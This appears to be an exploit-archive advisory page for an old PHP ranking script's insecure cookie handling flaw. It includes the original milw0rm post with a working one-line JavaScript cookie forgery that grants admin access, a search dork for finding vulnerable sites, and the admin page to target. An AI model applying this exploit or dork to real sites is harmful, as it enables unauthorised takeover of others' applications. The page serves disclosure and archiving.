Ranking Script - Insecure Cookie Handling Vulnerability

vendor:

Ranking Script

by:

Crackers_Child

8.8

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Ranking Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ranking Script – Insecure Cookie Handling Vulnerability

An attacker can exploit this vulnerability by setting a malicious cookie using the javascript command 'document.cookie = "admin=ja; path=/"'. This will allow the attacker to gain administrative access to the application.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

**************************************************************************************

Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : biyosecurity.com & milw0rm.com & tryag.cc & All My Friends

**************************************************************************************
Script   : Ranking Script  -  Insecure Cookie Handling Vulnerability
Demo     : http://www.ranking-script.de
Dork     : pagerank-0-topliste.html  or pagerank-0-tipp.html

**************************************************************************************

Exploit : javascript:document.cookie = "admin=ja; path=/";

Than go to > pagerank-0-admindaten.html and edit All thingz :)

**************************************************************************************
N0te : Ramazan Bayraminiz Mubarek Ola !
**************************************************************************************

# milw0rm.com [2008-10-01]